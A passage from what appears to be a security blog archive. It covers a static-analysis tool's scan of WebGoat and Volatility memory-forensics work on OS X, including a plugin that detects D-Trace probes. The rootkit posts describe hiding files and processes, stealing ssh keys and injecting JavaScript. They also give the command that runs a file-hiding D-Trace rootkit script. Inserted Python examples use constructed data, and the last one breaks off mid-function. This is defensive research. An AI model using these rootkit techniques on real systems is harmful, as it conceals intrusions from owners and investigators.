<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKsa-phsYNZ1_4y1XgIX6KE5X8OeM5dzeByLtnoAn6Qsxn6ZEhJ_4DFCPNfZRGr4mVkNXLJueygBKtuQ-bmq8041ZerlAnq-iiGpkK35Nd6CDpGXrbn_YEPKF58IxZsnET4xmfGgKABd52/s1600/Screen+Shot+2013-06-25+at+2.34.19+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKsa-phsYNZ1_4y1XgIX6KE5X8OeM5dzeByLtnoAn6Qsxn6ZEhJ_4DFCPNfZRGr4mVkNXLJueygBKtuQ-bmq8041ZerlAnq-iiGpkK35Nd6CDpGXrbn_YEPKF58IxZsnET4xmfGgKABd52/s1600/Screen+Shot+2013-06-25+at+2.34.19+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Define Parameters and Upload Code</td></tr>
</tbody></table>
<br />
The upload and analysis of WebGoat took about 15 minutes; this can vary depending on connectivity and the load on the analysis system, though theoretically load shouldn't be an issue since this is a scalable cloud based solution. At first glance it appears that the application is at 100% risk, with 514 high risk flaws. Surprise!<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_rZ-P8PPu14ugz7zCEHBznCnIVy8faqo00zMOx7tkjm9gpql9hPaiow_hDK7zqsTxNk-OrmjMKGtc3mgubSRGUBRRnvD38MaQRllbEGN5Kqxyb0eLij01-GtWSxH-BFhbI34NXS80f9bP/s1600/Screen+Shot+2013-06-25+at+3.07.58+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_rZ-P8PPu14ugz7zCEHBznCnIVy8faqo00zMOx7tkjm9gpql9hPaiow_hDK7zqsTxNk-OrmjMKGtc3mgubSRGUBRRnvD38MaQRllbEGN5Kqxyb0eLij01-GtWSxH-BFhbI34NXS80f9bP/s1600/Screen+Shot+2013-06-25+at+3.07.58+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Dashboard</td></tr>
</tbody></table>
<br />
The breakdown of these flaws suggests that the application has a problem with input validation since the high risk vulnerabilities are mostly composed of <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank">XSS</a>, <a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank">SQL injection</a>, and other injection type vulnerabilities. Not surprisingly medium risk vulnerabilities include <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">XSRF</a>, <a href="https://www.owasp.org/index.php/Web_Parameter_Tampering" target="_blank">parameter tampering</a>, and more XSS.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh985wnLZaMDajUP-WzQBhXzRWIxjb42RyhPoZqU267IM8ud0wwe_jLGD-j_BwsOQtpgAEiaIcUMTZyVq-NgtxczBclx7QQP4LHv1f_Cba85tX7No0OH_AajVul8RTPi58jm5j-iYasR585/s1600/Screen+Shot+2013-06-25+at+3.20.44+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh985wnLZaMDajUP-WzQBhXzRWIxjb42RyhPoZqU267IM8ud0wwe_jLGD-j_BwsOQtpgAEiaIcUMTZyVq-NgtxczBclx7QQP4LHv1f_Cba85tX7No0OH_AajVul8RTPi58jm5j-iYasR585/s1600/Screen+Shot+2013-06-25+at+3.20.44+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scan Summary</td></tr>
</tbody></table>
<br />
Drilling down on these reported issues is done by clicking the "Open Code Viewer" button, which takes the analyst to the IDE-like drill-down view. The UI shows the code with the vulnerability in the bottom pane and the associated chain of code under the "Attack Vector" section, which saves time while eliminating false positives. To mark a finding as a false positive, the analyst only has to check the box of the item in the "Results Table" and change its result state to "not exploitable." One shortcoming of this view is that it can't show the use of a vulnerable class in other classes of the application, so an analyst needs to manually scan for the reuse of this code.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi95oaYPszCfRhDRWy2-Go_wAs1QGpKP5V-aoozLgf2FhyphenhyphenI-SFb9nWEUR6orK5fHCwxSinzw3tm4wXGxHWVTOv10LygcDQZGU5acAV12Qiy_VbCKjimoKjlh5_G4ZtYXYvDaMjkioVxjAT-/s1600/Screen+Shot+2013-06-25+at+3.21.24+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi95oaYPszCfRhDRWy2-Go_wAs1QGpKP5V-aoozLgf2FhyphenhyphenI-SFb9nWEUR6orK5fHCwxSinzw3tm4wXGxHWVTOv10LygcDQZGU5acAV12Qiy_VbCKjimoKjlh5_G4ZtYXYvDaMjkioVxjAT-/s1600/Screen+Shot+2013-06-25+at+3.21.24+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code Viewer</td></tr>
</tbody></table>
<span style="font-family: inherit;">One great feature of this view is that the ‘Flow Chart’ tab will track the use of the vulnerable class and function across all other classes and lets you see the actual extent of the problem.</span><br />
<div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWfuMOzVpZsj9b_F6hrd1ksua4x1cHfYAGDUUAtsj9EpVeocnCjS49MDHZW4dUdHizF-ttuMS6c8Y2gTQgv4ugUfkO3d9v5B46r6F9XiXlhbfYEZU42DWUhsmdqYxyMl-44RsPxhzc97vl/s1600/Screen+Shot+2013-06-26+at+11.30.15+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWfuMOzVpZsj9b_F6hrd1ksua4x1cHfYAGDUUAtsj9EpVeocnCjS49MDHZW4dUdHizF-ttuMS6c8Y2gTQgv4ugUfkO3d9v5B46r6F9XiXlhbfYEZU42DWUhsmdqYxyMl-44RsPxhzc97vl/s320/Screen+Shot+2013-06-26+at+11.30.15+AM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Flow Chart View</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So how does it measure up on an easy target such as WebGoat? It depends... WebGoat has both real and simulated vulnerabilities, and this makes it difficult to evaluate the findings. Also, some vulnerabilities, such as 'Forgot Password', are business logic flaws that can't be detected by the analysis tool.<br />
<br />
On the other hand, Checkmarx CxCloud definitely shines in detecting XSS, SQL injection, various other injections, parameter tampering, hard coded credentials, application configuration issues, bad crypto usage, and session mismanagement. <br />
<h2>
Conclusion</h2>
<div>
<div style="text-align: left;">
</div>
Checkmarx CxCloud, with its slick UI, intuitive drill-down views and inclusion of security best practices, is a great help for developers who want to integrate security into their <a href="http://en.wikipedia.org/wiki/Systems_development_life-cycle" target="_blank">SDLC</a>. It will find most of the trivial vulnerabilities and sometimes surprise you by tracking down rogue code that would be hard to trace manually. The <a href="http://lp.checkmarx.com/cxcloud-v1/" target="_blank">free trial account</a> is easy to set up and use. All you have to keep in mind while using this tool is that business logic flaws could always be lurking behind the scenes and that manual inspection of the code is always necessary.</div>
</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-83093690785886644962013-05-13T14:13:00.002-07:002013-06-26T09:16:40.271-07:00check_dtrace - A Volatility Plugin Arises<h2>
Summary</h2>
After reading through fG!'s <a href="http://reverse.put.as/wp-content/uploads/2013/05/SysScan-13-Presentation.pdf" target="_blank">presentation</a> on OS X rootkits I decided to look into some other D-Trace providers, such as fbt and mach_trap to close the loop on the D-Trace topic. While this endeavor didn't start with the intention of building a plugin, I decided to do so to save time for myself and possibly others (and of course have some fun!).<br />
<h2>
Some OS X D-Trace providers</h2>
<div>
The D-Trace fbt provider has probes for almost <i>all</i> <i>kernel functions</i>, and is generally more useful when monitoring a particular behavior or issue in a specific kernel subsystem. This provider is very sensitive about OS versions so it requires some knowledge of OS internals.<br />
<br />
The syscall provider, on the other hand, lets you monitor the entry point into the kernel from applications in userland and is not very OS specific. While the syscall provider dynamically rewrites the syscall table, the fbt provider manipulates the stack to transfer control to the <a href="http://wiki.osdev.org/Interrupt_Descriptor_Table" target="_blank">IDT</a> handler, which transfers control to the D-Trace probe, which in turn emulates the replaced instruction.<br />
<br />
The mach_trap probes fire on entry or return of the specified Mach library function. Nemo uses this provider to hide processes from ps and the Activity Monitor in his <a href="http://felinemenace.org/~nemo/dtrace-infiltrate.pdf" target="_blank">presentation</a>.<br />
<br />
You can find a full list of providers at the <a href="http://developer.apple.com/library/ios/#documentation/DeveloperTools/Conceptual/InstrumentsUserGuide/CreatingCustomInstruments/CreatingCustomInstruments.html" target="_blank">Apple site</a>, but I'll be focusing on the three providers mentioned above.</div>
<div>
<h2>
Analysis </h2>
</div>
<div>
This time, instead of collecting memory samples, I <a href="http://blogs.vmware.com/kb/2013/04/installing-mac-os-x-10-8-mountain-lion-as-a-guest-operating-system-in-vmware-fusion-5.html" target="_blank">created an OS X VM</a> using VMware Fusion to do some live analysis, since the Volatility Framework can work with vmem files. Creating a VM is straightforward if you have the OS X installer app handy. To run a Volatility command on a vmem file:<br />
<br />
<pre>$ python vol.py mac_check_dtrace -f ~/Documents/Virtual\ Machines/Mac\ OS\ X\ 10.8\ 64-bit.vmwarevm/563d899c-18ee-3dc2-0fec-60b3b62d2b34.vmem --profile=MacMountainLion_10_8_3_AMDx64
</pre>
<br />
I had already talked about finding syscall probes in my <a href="http://siliconblade.blogspot.com/2013/04/hunting-d-trace-rootkits-with.html" target="_blank">previous post</a>, so I'll skip that. The mach_trap probe announces its presence in a similar fashion to a syscall probe, by replacing a trap table entry with a '_dtrace_machtrace_syscall' entry, which makes it easy to detect using the Volatility plugin check_trap_table:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzrosTo9zXp8AjrNtpFIyzZ4WNnARxoan_8yCZSK4m36efuYYlumk_GdWtQSjuq0OHyyKJQOZhzGPwRGqEdbiiN4MHCQLPCDnp8c3ps_MTW995IDL2zy2oJUM_ThZ1Q5OPd4QKskaIKKz/s1600/Screen+Shot+2013-05-13+at+5.19.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNzrosTo9zXp8AjrNtpFIyzZ4WNnARxoan_8yCZSK4m36efuYYlumk_GdWtQSjuq0OHyyKJQOZhzGPwRGqEdbiiN4MHCQLPCDnp8c3ps_MTW995IDL2zy2oJUM_ThZ1Q5OPd4QKskaIKKz/s1600/Screen+Shot+2013-05-13+at+5.19.51+PM.png" width="400" /></a></div>
<br />
The fbt probe on the other hand is not that obvious. The Volatility syscall plugin will not show any D-Trace or 'hooked' entries while the following D-Trace command is running:<br />
<br />
<pre>$ sudo dtrace -n 'fbt:mach_kernel:getdirentries64:entry{printf("%x",arg0);}'
</pre>
<br />
To detect the fbt probe, fG! provided a few good pointers in his <a href="http://reverse.put.as/wp-content/uploads/2013/05/SysScan-13-Presentation.pdf" target="_blank">latest presentation</a> about OS X rootkits. Using Volatility's mac_volshell plugin we can monitor the changes:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYinAD2KOtoKj9GJ00fBeIf4nHGbo3biX5oBC1SbIEyZiGgMcz48BxzDNW_v6Wl7Q3PkjnNHQReb-bB6gAZ60nSb5MZr8OsH0EvcDWluK7mJ7GEYYZK0ziuejCMSQfgYBca8ZKC19TLRym/s1600/Screen+Shot+2013-05-13+at+1.48.15+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYinAD2KOtoKj9GJ00fBeIf4nHGbo3biX5oBC1SbIEyZiGgMcz48BxzDNW_v6Wl7Q3PkjnNHQReb-bB6gAZ60nSb5MZr8OsH0EvcDWluK7mJ7GEYYZK0ziuejCMSQfgYBca8ZKC19TLRym/s1600/Screen+Shot+2013-05-13+at+1.48.15+PM.png" width="400" /></a></div>
<br />
The screenshot above shows the side by side comparison of before and during running the fbt probe. As suggested by fG!, the disassembly of the function shows that it has been patched. The check_dtrace plugin checks for the presence of this patch to detect the fbt probe.<br />
<h2>
A Plugin Arises</h2>
</div>
To save us the trouble of running three separate plugins and other commands, I've built the 'check_dtrace' plugin to detect syscall, mach_trap, and fbt probes to incorporate the discussed analysis. The plugin can be found at <a href="http://github.com/siliconblade/volatility/blob/master/mac/check_dtrace.py" target="_blank">github</a>.<br />
<br />
Below is a sample output of the plugin:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVhqytHwGwaA1k8HZou-qrW8rkYSfLYCeAW2zzRWlFwyi9G5pDav7ZziH4Epg6fbDSfe3BxEXwKW_9Fr0-W8iOkWxTI5E4AWWaZdyFxdVZjovy_r4ahpPOmsodOZE4K8HGIZBVWdqmRitN/s1600/Screen+Shot+2013-05-13+at+2.20.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVhqytHwGwaA1k8HZou-qrW8rkYSfLYCeAW2zzRWlFwyi9G5pDav7ZziH4Epg6fbDSfe3BxEXwKW_9Fr0-W8iOkWxTI5E4AWWaZdyFxdVZjovy_r4ahpPOmsodOZE4K8HGIZBVWdqmRitN/s1600/Screen+Shot+2013-05-13+at+2.20.07+PM.png" width="400" /></a></div>
<br />
The plugin was able to detect all three probes running concurrently at the target host.<br />
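A stand-alone model of the two checks described above, added here as an example and not the check_dtrace plugin's code: a trap table entry whose handler resolves to the D-Trace machtrace handler, and an fbt probe detected as a byte-level change to a kernel function's prologue. The addresses, table contents, function bytes and the patch byte are all constructed (the post does not give the byte fbt writes).<br />

```python
"""Added example, not the check_dtrace plugin's code: a stand-alone model of
the two detections the post describes for mach_trap and fbt probes.

All addresses, table contents and function bytes are constructed. The real
plugin reads the trap table and kernel function bytes from the memory image
through Volatility's profile and address space.
"""
from collections import namedtuple

Finding = namedtuple("Finding", "kind where detail")

# Constructed symbol map; the handler name is the one the post says a
# mach_trap probe installs in the trap table.
SYM_BY_ADDR = {
    0xffffff802e9a1000: "_mach_msg_trap",
    0xffffff802e9a1400: "_task_self_trap",
    0xffffff802eb30200: "_dtrace_machtrace_syscall",
}


def check_trap_table(handlers, sym_by_addr):
    """Flag every trap table entry whose handler resolves to the D-Trace
    machtrace handler instead of the Mach trap it should point to."""
    return [Finding("mach_trap probe", idx, sym_by_addr.get(h, "%#x" % h))
            for idx, h in enumerate(handlers)
            if sym_by_addr.get(h) == "_dtrace_machtrace_syscall"]


def check_fbt_patch(func_name, pristine, live):
    """Diff a function's in-memory bytes against a pristine copy (for example
    from the kernel file on disk). A change at offset 0 is what an entry probe
    such as fbt:mach_kernel:getdirentries64:entry leaves in the function."""
    diffs = [(off, p, l) for off, (p, l) in enumerate(zip(pristine, live)) if p != l]
    if not diffs:
        return None
    kind = "fbt patch (function entry)" if diffs[0][0] == 0 else "fbt patch (function body)"
    return Finding(kind, func_name, diffs)


def run_checks():
    """Run both checks over a constructed snapshot with one probe of each kind."""
    # Trap table handlers: entry 2 currently hooked by a running mach_trap probe.
    traps = [0xffffff802e9a1000, 0xffffff802e9a1400, 0xffffff802eb30200]
    # Prologue of getdirentries64 as it would read on disk (push rbp; mov rbp,rsp;
    # push r15; push r14) and the live copy with its first byte overwritten.
    # 0xCC is a constructed placeholder; the post does not give the byte fbt writes.
    pristine = bytes.fromhex("554889e541574156")
    live = bytes([0xCC]) + pristine[1:]
    findings = check_trap_table(traps, SYM_BY_ADDR)
    patch = check_fbt_patch("_getdirentries64", pristine, live)
    if patch is not None:
        findings.append(patch)
    return findings


if __name__ == "__main__":
    for f in run_checks():
        print("%-28s %-18s %s" % (f.kind, f.where, f.detail))
```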
<h2>
Conclusion</h2>
<div>
Thanks to fG!, Nemo and the Volatility Framework, I did have a good time with OS X internals! While the check_dtrace plugin is not that complex, it's able to detect otherwise not so obvious D-Trace rootkit techniques. And again we have seen that it's tough to hide in memory. </div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-3985047663487010332013-04-23T20:03:00.000-07:002013-05-29T20:45:11.681-07:00Hunting D-Trace Rootkits with The Volatility Framework<h2>
Summary</h2>
<div>
I recently attended <a href="http://www.infiltratecon.com/" target="_blank">InfiltrateCon 2013</a> and got to see the latest and greatest offensive security issues. There was a <a href="http://felinemenace.org/~nemo/dtrace-infiltrate.pdf" target="_blank">presentation</a> by <a href="http://2013.infosecsouthwest.com/speakers.html#neil_archibald" target="_blank">Nemo</a> titled 'Destructive D-Trace - With Great Power Comes Great Responsibility' that caught my attention. In his talk Nemo showed examples on how to use D-Trace on OS X to hide an attacker's presence and claimed that forensics techniques would have a hard time detecting these. That claim made me think about the <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23" target="_blank">Volatility Framework</a>'s latest support for Mac OS X memory analysis and its capability to detect the presence of D-Trace cloaking.</div>
<h2>
Destructive D-Trace and Rootkits</h2>
<div>
D-Trace is generally thought of as a dynamic tracing framework used for troubleshooting system issues in real time. While the idea of using D-Trace for reverse engineering and rootkit detection has been around for a while [<a href="http://blackhat.com/presentations/bh-usa-08/Beauchamp_Weston/BH_US_08_Beauchamp-Weston_DTrace.pdf" target="_blank">pdf</a>], to my knowledge it has not been used as a rootkit development platform. In his presentation, Nemo presented techniques to hide files from ls/lsof/Finder, hide processes from Activity Monitor/ps/top, capture private keys from ssh sessions, and inject JavaScript into HTML pages as they are rendered by Apache. To realize these techniques he used D-Trace's '<a href="http://docs.oracle.com/cd/E18752_01/html/819-5488/gcfbn.html#gcfrv" target="_blank">destructive actions</a>', such as copyout. </div>
<h2>
The Volatility Framework on OS X</h2>
<div>
The Volatility Framework included OS X support in its main body of code back in <a href="https://code.google.com/p/volatility/source/list?path=/trunk/volatility/plugins/mac/__init__.py&start=2698" target="_blank">October 2012</a>. Since then there has been a steady flow of <a href="https://code.google.com/p/volatility/source/browse/trunk/volatility/plugins/mac/" target="_blank">plugins</a> for the OS X platform. Using the Volatility Framework's plugins you can get a list of running or dead processes, get mounted devices, detect rootkits and more. A typical command to get a list of processes looks like:</div>
<div>
<br /></div>
<div>
<pre>$ python vol.py mac_pslist -f ~/memory_samples/ram_dump.mach-o --profile=MacLion_10_7_4_AMDx64
</pre>
</div>
<h3>
Memory Profiles</h3>
<div>
One of the following can be used as the --profile option, depending on the analyzed system:</div>
<div>
<br /></div>
<div>
<table>
<tbody>
<tr>
<td>MacLeopard_10_5_3_Intel
MacLeopard_10_5_4_Intelx86
MacLeopard_10_5_5_Intelx86
MacLeopard_10_5_6_Intelx86
MacLeopard_10_5_7_Intelx86
MacLeopard_10_5_8_Intelx86
MacLeopard_10_5_Intelx86
MacLion_10_7_1_AMDx64
MacLion_10_7_1_Intelx86
MacLion_10_7_2_AMDx64
MacLion_10_7_2_Intelx86
MacLion_10_7_3_AMDx64
MacLion_10_7_3_Intelx86
MacLion_10_7_4_AMDx64
MacLion_10_7_4_Intelx86
MacLion_10_7_5_AMDx64
MacLion_10_7_5_Intelx86
MacLion_10_7_AMDx64
MacLion_10_7_Intelx86
</td>
<td>MacMountainLion_10_8_1_AMDx64
MacMountainLion_10_8_2_AMDx64
MacMountainLion_10_8_3_AMDx64
MacSnowLeopard_10_6_1_AMDx64
MacSnowLeopard_10_6_1_Intelx86
MacSnowLeopard_10_6_2_AMDx64
MacSnowLeopard_10_6_2_Intelx86
MacSnowLeopard_10_6_4_AMDx64
MacSnowLeopard_10_6_4_Intelx86
MacSnowLeopard_10_6_5_AMDx64
MacSnowLeopard_10_6_5_Intelx86
MacSnowLeopard_10_6_6_AMDx64
MacSnowLeopard_10_6_6_Intelx86
MacSnowLeopard_10_6_7_AMDx64
MacSnowLeopard_10_6_7_Intelx86
MacSnowLeopard_10_6_8_AMDx64
MacSnowLeopard_10_6_8_Intelx86
MacSnowLeopard_10_6_AMDx64
</td>
</tr>
</tbody></table>
</div>
<br />
If you are not sure which profile to use, you can save the above table's content in a file (e.g. macprofiles.txt) and brute force it with the following command until you get <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_tasks" target="_blank">valid output</a>:<br />
<br />
<pre>awk '{print("python vol.py mac_tasks -f ram_dump.mach-o --profile="$0);system("python vol.py mac_tasks -f ram_dump.mach-o --profile="$0)}' macprofiles.txt</pre>
<h3>
OS X Plugins for Detecting Rootkits</h3>
<div>
<table>
<tbody>
<tr>
<td><b>mac_check_syscalls
</b></td>
<td> Checks to see if system call table entries are hooked
</td>
</tr>
<tr>
<td><b>mac_check_sysctl
</b></td>
<td> Checks for unknown sysctl handlers
</td>
</tr>
<tr>
<td><b>mac_check_trap_table
</b></td>
<td> Checks to see if Mach trap table entries are hooked
</td>
</tr>
<tr>
<td><b>mac_trustedbsd
</b></td>
<td> Lists malicious TrustedBSD policies
</td>
</tr>
<tr>
<td><b>mac_notifiers
</b></td>
<td> Detects rootkits that add hooks into I/O Kit (e.g. LogKext)
</td>
</tr>
<tr>
<td><b>mac_ip_filters
</b></td>
<td> Reports any hooked IP filters
</td>
</tr>
</tbody>
</table>
</div>
<h2>
Simple D-Trace Rootkit</h2>
<div>
I'll only be showing one example that's based on Nemo's presentation since he mentioned that he had a book coming out this summer that talks about OS X Rootkits and I don't want to ruin the fun for him. The example I'll show is a simple D-Trace rootkit that can hide a folder from the command <a href="http://linux.die.net/man/1/ls" target="_blank">ls</a>. It uses syscall probes to hook the <a href="http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/vfs/vfs_syscalls.c" target="_blank">getdirentries64</a> function and rewrites the function's return values to hide the target folder. You can find the script at <a href="https://github.com/siliconblade/dtrace/blob/master/dirhide.d" target="_blank">github.com/siliconblade/dtrace</a>. To run the script in destructive mode you'll have to use the following command:<br />
<br />
<pre>sudo dtrace -w -s dirhide.d</pre>
</div>
<br />
Once running, the script will hide the third entry in the /private/tmp folder.<br />
<br />
Before running the script (output of ls -la /private/tmp; the third entry, .badness, is the one we will be hiding):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnZbxBCeq6uSB81E3ixM3sZwql2N9kN6RoO1tnV2kRLbXLZtoBKB7rGHByO9MI7ac21oAw-oS7nBbN1_BF-Nnxz1HArvFkO1VVDEL3zgODcwvTCXTNFi6XBJ-N1tshpTb_0q-BF7m_7oA/s1600/Screen+Shot+2013-04-23+at+6.27.06+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqnZbxBCeq6uSB81E3ixM3sZwql2N9kN6RoO1tnV2kRLbXLZtoBKB7rGHByO9MI7ac21oAw-oS7nBbN1_BF-Nnxz1HArvFkO1VVDEL3zgODcwvTCXTNFi6XBJ-N1tshpTb_0q-BF7m_7oA/s400/Screen+Shot+2013-04-23+at+6.27.06+PM.png" width="400" /></a></div>
<br />
Running the script:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEidguwZkfRoEsQKdisTIS3i4WHvSl6SodyNlg4o7u2D7LRwJ4YeGdo1_wmeeASESdmbChf0MJAu5OdpX4oDtfxeYLcEjrkyAc4yBQpN5caKRUxoSk6BQT6xoy3vx76Qb0uJrETgb-uEzD/s1600/Screen+Shot+2013-04-23+at+2.45.33+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEidguwZkfRoEsQKdisTIS3i4WHvSl6SodyNlg4o7u2D7LRwJ4YeGdo1_wmeeASESdmbChf0MJAu5OdpX4oDtfxeYLcEjrkyAc4yBQpN5caKRUxoSk6BQT6xoy3vx76Qb0uJrETgb-uEzD/s400/Screen+Shot+2013-04-23+at+2.45.33+PM.png" width="400" /></a></div>
<br />
During script execution .badness is no longer visible (ls -la /private/tmp):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPYIYMnji5lLJjUa1ca341Smueci0W0kiMGnYbAuSkUOxUCNTMStD1WDb4UZLpqFDWeUJoiMcerL0dzFTwg-VdBMVnyDYYPd_Vn-xrjUixm7g-4itPLr0CivcPlx6-XTtfS2SVy-p2doc/s1600/Screen+Shot+2013-04-23+at+6.32.29+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPYIYMnji5lLJjUa1ca341Smueci0W0kiMGnYbAuSkUOxUCNTMStD1WDb4UZLpqFDWeUJoiMcerL0dzFTwg-VdBMVnyDYYPd_Vn-xrjUixm7g-4itPLr0CivcPlx6-XTtfS2SVy-p2doc/s400/Screen+Shot+2013-04-23+at+6.32.29+PM.png" width="400" /></a></div>
<br />
<h2>
Collecting Memory Samples</h2>
<div>
To detect the changes introduced by D-Trace, you'll need to collect memory samples before and while the script is running. This can be done with the <a href="http://cybermarshal.com/index.php/cyber-marshal-utilities/mac-memory-reader" target="_blank">Mac Memory Reader</a>. As suggested on the tool's web site, you can use the following command to save the memory sample on a FAT-formatted drive:<br />
<br />
<pre>sudo ./MacMemoryReader - | split -b 2048m - ram_dump.mach-o.
</pre>
</div>
<h2>
Analysis of the Samples</h2>
<div>
Since we know that the D-Trace script used syscall probes to hook the getdirentries64 function, we will use the Volatility Framework's mac_check_syscalls plugin to check for the hook's presence. Running mac_check_syscalls on the memory sample with the hooked function will not yield an entry with the 'HOOKED' label, even though that is what the plugin is designed to report. The reason is that the plugin only checks whether a syscall handler's address falls within the known kernel symbol addresses, and the D-Trace syscall handler is itself a known kernel symbol. For that reason we captured before and after samples to monitor the changes in the system. The following commands were executed on the before and after samples:</div>
<div>
<br /></div>
<div>
<pre>$ python vol.py mac_check_syscalls -f ~/memory_samples/ram_dump-before.mach-o --profile=MacLion_10_7_4_AMDx64 > before_syscalls.txt
</pre>
<pre>$ python vol.py mac_check_syscalls -f ~/memory_samples/ram_dump-after.mach-o --profile=MacLion_10_7_4_AMDx64 > after_syscalls.txt</pre>
</div>
<br />
To view the difference between the two output files:<br />
<br />
<pre>$ diff before_syscalls.txt after_syscalls.txt</pre>
<pre>< SyscallTable 344 0xffffff8000306b20 _getdirentries64
---
> SyscallTable 344 0xffffff80005c89e0 _dtrace_systrace_syscall
</pre>
<span style="font-weight: normal;"><br /></span>
<span style="font-weight: normal;">The diff output shows that the getdirentries64 syscall entry in row #344 was replaced with the D-Trace systrace handler. </span><br />
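As an added example that is not code from this post or from the Volatility Framework, the following Python reads mac_check_syscalls-style output (table name, index, address and symbol per line, the format visible in the diff above) and performs both checks described here: the before/after diff, and the direct search for entries that resolve to _dtrace_systrace_syscall. The sample output is constructed; only the two values for entry 344 come from the diff above, and the header line and the neighbouring rows are assumptions.<br />

```python
import re
from typing import Dict, List, Optional, Tuple

# Added example; not code from the blog post or from the Volatility Framework.
# It reads mac_check_syscalls-style output (table name, index, address, symbol
# per line, the format seen in the post's diff) and flags D-Trace syscall hooks.

# Symbol that mac_check_syscalls reported for the hooked entry in the post.
# Assumption: an entry resolving to it means the systrace provider has replaced
# the original handler for that syscall number.
DTRACE_HOOK_SYMBOLS = {"_dtrace_systrace_syscall"}

# One output row: "<table> <index> <address> <symbol>". Header and blank lines
# do not match and are skipped.
ROW_RE = re.compile(r"^\s*(\w+)\s+(\d+)\s+(0x[0-9a-fA-F]+)\s+(\S+)\s*$")

Entry = Tuple[str, str]                 # (handler address, symbol)
Table = Dict[Tuple[str, int], Entry]    # (table name, index) -> entry

# Constructed samples. The two rows for index 344 carry the real before/after
# values from the post; the header line and the neighbouring rows are made up
# for the example.
BEFORE = """\
Table Name   Index Address            Symbol
SyscallTable 343   0xffffff8000306a00 _fstat64_extended
SyscallTable 344   0xffffff8000306b20 _getdirentries64
SyscallTable 345   0xffffff8000306c40 _statfs64
"""

AFTER = """\
Table Name   Index Address            Symbol
SyscallTable 343   0xffffff8000306a00 _fstat64_extended
SyscallTable 344   0xffffff80005c89e0 _dtrace_systrace_syscall
SyscallTable 345   0xffffff8000306c40 _statfs64
"""


def parse_table(text: str) -> Table:
    """Turn plugin output into a {(table, index): (address, symbol)} mapping."""
    table: Table = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
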